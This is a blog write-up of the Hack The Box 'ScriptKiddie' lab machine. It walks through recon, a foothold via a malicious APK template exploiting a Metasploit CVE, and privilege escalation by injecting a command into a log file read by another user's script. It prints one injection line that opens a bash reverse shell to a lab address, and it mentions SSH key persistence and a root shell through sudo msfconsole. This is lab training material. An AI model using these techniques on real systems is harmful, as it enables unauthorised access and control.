After a long hiatus to focus on school and an internship stint ever since achieving OSCP, I am finally back on Hack-The-Box working on all the active boxes, hoping to clear all of the active boxes at one point. In this series, I will be releasing the write-up for boxes that I have successfully rooted as they are retired from the active boxes.
In this first post of the series, we will be sharing about how we root ScriptKiddie. ScriptKiddie is an easy linux box. The initial entry is based on a CVE found on the Metasploit Framework. As the title of the box, we are hacking a “scriptkiddie”. The privilege escalation is done through command injection to escalate to pwn user which has the ability to run msfconsole with root privileges which allows us to use the console to read root.txt.
Recon
To begin with this box, we first carry out our basic Reconnaissance. For me, I used AutoRecon which is developed and scripted by Tib3rius. It is one of my fundamental scans I make before moving on to more manual enumeration for specific ports or applications. From the quick Nmap scan results done by AutoRecon:
On our Nmap scan, we see that port 22 and port 5000 is open. Port 22 indicate OpenSSH 8.2p1 Ubuntu which using Google, we will find that the linux distribution is Ubuntu Focal (Ubuntu 20.04). We see that Werkzing httpd 0.16.1 on Port 5000. That will be where we will start enumeration and information gathering on the target.
Information Gathering
Browsing to 10.10.10.226:5000, we are directed to the following page:
There are several user input fields here. First, we tested for command injection but there was nothing much in the other fields. Next we notice that under the payloads section, it is a payload generation functionality based upon some form of template file which we can possibly create using msfvenom. This gave an idea where if we can upload our msfvenom payload and trigger it, we can get shell. So we tried using an ELF file generated from msfvenom, but it was not very successful. However, when we tried to upload on Android option:
It says that it required an apk extension file when we attempted to upload the elf file we generated. This gave an idea to google about APK files and metasploit. We were led to the following CVE which seems interesting and likely for our use case. Following this:
We modify the payload by injecting our reverse shell code execution with our Listening Host and Port:
We then execute the python script to generate our evil.apk file:
We then uploaded the evil.apk generated and upload as template on the Web application. We then check our listener and see we have successfully obtain shell:
We then grab the user.txt flag:
To maintain our foothold, we place our public key as one of the authorized_keys to ssh in as kid. We then use SSH to continue.
Privilege Escalation
Checking what is on kid’s home directory, we notice that there is a logs folder on the kid home directory:
Checking what these files are:
Noticing as well that when we look at pwn home directory, we can see what is in his directory. Inside his directory there is a script called scanloser.sh . The script reads a file from the hackers file in the log folder of kid home directory in which kid has write permissions to.
We can inject command by writing into the hackers file in the log folder in kid home directory. Notice how there is a cut command which delimits by spacing. So through trial-and-errors, we find that we will need two spacing at the start so that the payload will work.
;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/1234 0>&1’ #
And we check our listener after adding this into hackers file
Checking our sudo permissions on pwn, we see that pwn is able to execute msfconsole without passwd as sudo. Using this we can get a root “shell”.
We see that we are able to execute the command as if we were in a shell. We can then us nc to create a reverse shell as root on another listener:
Checking our listener:
We obtained root.txt and rooted the machine!
Learning Points
Well funny enough, the machine is named after ScriptKiddie, and I do not really see why there is really a need to host your tools on your server and allow people to upload template files and use these tools through a web service. Normally, I will write about how if this box was a real machine, how it could be better secure. For this box, I just do not see any real reason why someone would host this on a web server. However, for the privilege escalation from kid to pwn and pwn to root, I felt that it was due to misplaced trust by root on pwn to allow sudo usage without password and that when one user is using input from a file owned by another user, it is important to check through the input read and perform some form of input validation or sanitisation before using it in the script. The result of us being able to command inject and elevate ourselves to pwn which is a trusted user by root allowed us to root this machine.
Overall the box was pretty okay, with a few trial-and-errors on my part (maybe that is where I need to improve too). However, this box is just not realistic in terms of getting user.
Thank you for reading! And like always if you enjoy this write-ups, subscribe to my publications or follow me on twitter @lojomojo96 and hit me up with a DM! Let me know what other stuff you want to see me write on as well.
